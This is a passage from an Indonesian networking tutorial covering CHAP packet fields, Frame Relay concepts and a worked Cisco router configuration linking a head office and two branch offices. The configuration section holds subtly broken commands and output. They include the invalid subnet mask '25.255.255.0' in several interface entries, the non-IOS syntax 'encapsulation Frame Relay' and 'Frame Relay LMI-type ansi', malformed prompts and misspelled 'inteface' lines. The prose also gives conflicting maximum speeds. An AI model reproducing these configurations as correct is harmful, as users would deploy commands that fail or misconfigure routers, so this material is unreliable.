Field value ini berisi satu atau lebih byte. Byte yang terbesar ditransmisikan terlebih dahulu. Nilai dari challenge adalah variabel aliran dari byte. Pentingnya nilai challenge yang unik dan hubungannya dengan nilai rahasia akan dijelaskan lebih lanjut. Nilai challenge harus berubah setiap kalichallenge dikirimkan. Panjang dari nilai challenge bergantung pada metode yang digunakan untuk menghasilkan byte dan saling bebas terhadap algoritma hash yang digunakan.
Nilai response merupakan hasil perhitungan hash satu arah pada aliran byte yang terdiri dari Identitas, diikuti (di-concate dengan) nilai rahasia, dan nilaichallenge. Panjang dari nilai response bergantung pada algoritma hash yang digunakan. (MD5: 16-byte)
5. Name
Field dari Nama berisi satu atau lebih byte yang merepresentasikan identitas dari sistem transmisi paket. Tidak ada batasan pada isi dari field ini. Sebagai contoh, field ini dapat berisi rangkaian karakter ASCII atau identitas unik dalam syntax ASN.1. Nama tidak diperkenankan NUL atau CR/LF. Ukurannya ditentukan dari panjang Field.
Sukses dan Kegagalan
Jika Nilai yang diterima dalam Respon sama dengan yang nilai diharapkan, maka otentikator harus mengirimkan paket CHAP dengan kolom kode di-set ke 3 (Sukses).
Jika Nilai yang diterima dalam Respon tidak sama dengan yang diharapkan nilai, maka otentikator harus mengirimkan paket CHAP dengan kolom Kode diatur ke 4 (gagal), dan mengakhiri link.
Ringkasan mengenai format paket challenge dan response adalah sebagai berikut:
Field yang ditransmisikan dari kiri ke kanan.

Kode:
3 untuk Sukses;
4 untuk Kegagalan.
Identifier merupakan 1 oktet untuk membandingkan request dan replies. Identifier harus diambil dari field identifier pada respon.
Message merupakan 0 atau lebih oktet, isinya bisa dibaca dan tidak boleh mempengaruhi operasi dalam protocol, direkomendasikan isi dari pesan ini merupakan karakter ASCII antara decimal 32 sampai 126. Ukurannya ditentukan dari field length.

Frame Relay

Frame relay merupakan protocol WAN yang mempunyai performance tinggi yang bisa
memberikan koneksi jaringan WAN sampai 2,048 Mbps (dan bahkan bisa lebih tinggi) ke
berbagai belahan dunia. Frame relay menggunakan circuit virtual untuk koneksi site-2 dan
memberikan lebar pipa bandwidth berskala yang bisa dijamin (dengan menggunakan apa yang
disebut sebagai CIR- committed information rate). Frame relay begitu popular karena penawaran
bandwidth yan berskala melalui jalur digital. Dengan menggunakan konfigurasi standard frame
relay akan merupakan cara yang sederhana untuk meminimalkan masalah jaringan-2 frame relay.

Frame relay didesign untuk transmisi digital melalui medium yang sudah handal, yang
pada umumnya adalah fiber optic, bandingkan dengan jaringan yang menggunakan X.25 yang
pada awalnya didesign untuk jaringan transmisi analog melalui medium yang dianggap tidak
handal seperti standard line telpon.

Frame Relay adalah protokol packet-switching yang menghubungkan perangkat-perangkat
telekomunikasi pada satu Wide Area Network (WAN). Protokol ini bekerja pada lapisan Fisik
dan Data Link pada model referensi OSI. Protokol Frame Relay menggunakan struktur Frame
yang menyerupai LAPD, perbedaannya adalah Frame Header pada LAPD digantikan oleh field
header sebesar 2 bita pada Frame Relay.

Berikut ini adalah fitur utama dari frame relay:

Frame relay memberikan deteksi error tapi tidak memberikan recovery error.
Frame relay memberikan transfer data sampai 1.54Mbs
Frame relay mempunyai ukuran paket yang bervariable (disebut frame)
Frame relay bisa dipakai sebagai koneksi backbone kepada jaringan LAN
Frame relay bisa dimplementasikan melalui berbagai macam koneksi sambungan (56K,
T1, T3)
Frame relay beroperasi pada layer physical dan layer Data link pada model OSI

Keuntungan Frame Relay

Frame Relay menawarkan alternatif bagi teknologi Sirkuit Sewa lain seperti jaringan
X.25 dan sirkuit Sewa biasa. Kunci positif teknologi ini adalah:
Sirkuit Virtual hanya menggunakan lebar pita saat ada data yang lewat di dalamnya,
banyak sirkuit virtual dapat dibangun secara bersamaan dalam satu jaringan transmisi.
Kehandalan saluran komunikasi dan peningkatan kemampuan penanganan error pada
perangkat-perangkat telekomunikasi memungkinkan protokol Frame Relay untuk

mengacuhkan Frame yang bermasalah (mengandung error) sehingga mengurangi data
yang sebelumnya diperlukan untuk memproses penanganan error.



5. PRINSIP KERJA FRAME RELAY

• Aliran data pada dasarnya pengarahannya berbasis pada header yang memuat DLCI,
yang mendeskripsikan tujuan frame-nya. Jika jaringan mempunyai masalah dalam
menangani sebuah frame, baik yang disebabkan oleh kesalahan jaringan atau kemacetan
secara praktis ia akan membuang frame tersebut.

• Frame Relay membutuhkan jaringan dengan laju kesalahan yang rendah (low error rate)
untuk mencapai kinerja yang baik. Jaringannya tidak mempunyai kemampuan untuk
mengoreksi kesalahan, maka Frame Relay tergantung pada protokol-protokol pada
lapisan yang lebih tinggi di dalam piranti-piranti pengguna yang memiliki kecerdasan
untuk memulihkannya dengan mentransmisikan ulang frame-frame yang hilang.

• Pemulihan kesalahan oleh protokol-protokol lapisan yang lebih tinggi, walaupun itu
otomatis dan andal, adalah tidak ekonomis dipandang dari sudut penundaan pemrosesan
dan lebarpita. Maka mau tidak mau jaringannya harus meminimumkan terjadinya
pembuangan frame.

v. Implementasi
Frame Relay dapat digunakan untuk jaringan publik dan jaringan “private” perusahaan atau
organisasi.

1. Jaringan Publik
Pada jaringan publik Frame Relay, “Frame Relay switching equipment” (DCE) berlokasi
di kantor pusat (central) perusahaan penyedia jaringan telekomunikasi. Pelanggan hanya
membayar biaya berdasarkan pemakain jaringan, dan tidak dibebani administrasi dan
pemeliharan perangkat jaringan Frame Relay.
2. Jaringan “Private”
Pada jaringan “private” Frame Relay, administrasi dan pemeliharaan jaringan adalah tanggung
jawab perusahaan (private company). Trafik Frame Relay diteruskan melalui “interface” Frame
Relay pada jaringan data. Trafik “Non-Frame Relay” diteruskan ke jasa atau aplikasi yang sesuai
(seperti “private branch exchange” *PBX+ untuk jasa telepon atau untuk aplikasi “video-
teleconferencing”).

Konsep Cara Data ditransmisikan
1. Router membuat koneksi ke switch frame relay baik langsung maupun lewat CSU/DSU
2. Jaringan Frame relay mensimulasikan suatu koneksi “selalu on” dengan PVC
3. Outer pengirim mulai mengirim data segera tanpa membentuk suatu sesi
4. Switch frame relay melaksanakan pemeriksaan error tapi tidak memperbaiki error tersebut
5. Paket yang corrupt akan di jatuhkan tanpa notifikasi

6. Paket akan menjelajah melalu cloud frame relay tanpa adanya acknowledgement
7. Piranti pengirim dan penerima lah yang akan melakukan koreksi error
8. Switch frame relay akan mulai menjatukan paket jika kemapetan jalur mulai terbentuk
9. Kebanjiran atau kemampetan jaringanlah penyebab dari kehilangan paket secara umum pada
jaringan frame relay
10. Paket akan dihilangkan berdasarkan informasi pada bit Discard Elligable (DE)
11. Switch frame relay mengirim notifikasi Backward explicit congestion notification (BECN)
untuk mengisyaratkan menurunkan rate transfer data.

Konfigurasi Frame Relay dengan Cisco Router

Konfigurasi LAN di Head Office:

Network : 10.10.10.0
Subnet Mask : 255.255.255.0
Jumlah IP Host : 10.10.10.1 sd 10.10.10.254 (254 IP Addresses)
IP PC Server : 10.10.10.2
PC Client : 10.10.10.4 & 10.10.10.5
IP Ethernet Router : 10.10.10.1

Konfigurasi LAN Remote A/Branch Office:

Network : 10.10.11.0
Subnet Mask : 255.255.255.0
Jumlah IP Host : 10.10.11.1 sd 10.10.11.254 (254 IP Addresses)
PC Client : 10.10.11.2 & 10.10.11.4
IP Ethernet Router : 10.10.11.1

Konfigurasi LAN Remote B/Branch Office:

Network : 10.10.15.0
Subnet Mask : 255.255.255.0
Jumlah IP Host : 10.10.15.1 sd 10.10.15.254 (254 IP Addresses)
PC Client : 10.10.15.2 & 10.10.15.4
IP Ethernet Router : 10.10.15.1

Gambar Konfigurasi:

Konfigurasi Router Cisco Head Office

Konfigurasi Ethernet

RouterHQ#config term
RouterHQ(config)#interface fastethernet 0/0
RouterHQ(config-if)#ip address 10.10.10.1 255.255.255.0
RouterHQ(config-if)#speed auto
RouterHQ(config-if)#duplex auto
RouterHQ(config-if)#exit

Konfigurasi WAN Serial
Sub-interface for point-to-point connection

RouterHQ#config term
RouterHQ(config)#interface serial 0
RouterHQ(config-if)#encapsulation Frame Relay
RouterHQ(config-if)#Frame Relay LMI-type ansi

RouterHQ(config)#interface serial0.1 point-to-point
RouterHQ(config-subif)#ip address 192.168.1.1 255.255.255.252
RouterHQ(config-subif)#frame-relay interface-dlci 50
(contoh jika koneksi ke remote A menggunakan DLCI 50)

RouterHQ(config)#interface serial0.2 point-to-point
RouterHQ(config-subif)#ip address 192.168.1.5 255.255.255.252
RouterHQ(config-subif)#frame-relay interface-dlci 100
(contoh jika koneksi ke remote B menggunakan DLCI 100)

Konfigurasi Routing Statik ke Remote A dan Remote B

RouterHQ(config)#ip route 10.10.11.0 255.255.255.0 s0.1
RouterHQ(config)#ip route 10.10.15.0 255.255.255.0 s0.2

=========================================

Konfigurasi Router Cisco Remote A

Konfigurasi Ethernet

RouterA#config term
RouterA#(config)#interface fastethernet 0/0
RouterA#(config-if)#ip address 10.10.11.1 25.255.255.0
RouterA#(config-if)#speed auto
RouterA#(config-if)#duplex auto
RouterA#(config-if)#exit

Konfigurasi WAN Serial
Sub-interface for point-to-point connection

RouterA(config)#interface serial 0
RouterA(config-if)#encapsulation Frame Relay
RouterA(config-if)#Frame Relay LMI-type ansi
RouterA(config-if)#exit
!
RouterA(config)#interface serial0.1 point-to-point

RouterA(config-subif)#ip address 192.168.1.2 255.255.255.252
RouterA(config-subif)#frame-relay interface-dlci 50

Routing Statik ke Head Office

RouterA(config)#ip route 10.10.10.0 255.255.255.0 s0.1

=========================================

Konfigurasi Router Cisco Remote B

Konfigurasi Ethernet

Konfigurasi Ethernet

RouterB#config term
RouterB#(config)#interface fastethernet 0/0
RouterB#(config-if)#ip address 10.10.15.1 25.255.255.0
RouterB#(config-if)#speed auto
RouterB#(config-if)#duplex auto
RouterB#(config-if)#exit

Konfigurasi WAN Serial
Sub-interface for point-to-point connection

RouterB(config)#interface serial 0
RouterB(config-if)#encapsulation Frame Relay
RouterB(config-if)#Frame Relay LMI-type ansi
RouterB(config-if)#exit
!
RouterB(config)#interface serial0.1 point-to-point
RouterB(config-subif)#ip address 192.168.1.6 255.255.255.252
RouterB(config-subif)#frame-relay interface-dlci 100

Routing Statik ke Head Office
RouterB(config)#ip route 10.10.10.0 255.255.255.0 s0.1

=========================================

Hasil Show Running Configuration

RouterHQ#sh running
!

inteface FastEthernet 0
ip address 10.10.10.1 25.255.255.0
speed auto
duplex auto

inteface serial 0
encapsulation Frame-Relay
Frame Relay LMI-type ansi

interface serial 0.1 point-to-point
ip address 192.168.1.1 255.255.255.252
frame-relay interface-DLCI 50

interface serial 0.2 point-to-point
ip address 192.168.1.5 255.255.255.252
frame-relay interface-DLCI 100

!

ip classless
ip route 10.10.11.0 255.255.255.0 s0.1
ip route 10.10.15.0 255.255.255.0 s0.2

RouterA#sh running
!

inteface FastEthernet 0
ip address 10.10.11.1 25.255.255.0
speed auto
duplex auto

inteface serial 0
encapsulation Frame-Relay
Frame Relay LMI-type ansi

interface serial 0.1 point-to-point
ip address 192.168.1.2 255.255.255.252
frame-relay interface-DLCI 50

!
ip classless
ip route 10.10.10.0 255.255.255.0 s0.1

RouterB#sh running
!

inteface FastEthernet 0
ip address 10.10.15.1 25.255.255.0
speed auto
duplex auto

inteface serial 0
encapsulation Frame-Relay
Frame Relay LMI-type ansi

interface serial 0.1 point-to-point
ip address 192.168.1.6 255.255.255.252
frame-relay interface-DLCI 100

!
ip classless
ip route 10.10.10.0 255.255.255.0 s0.1

read more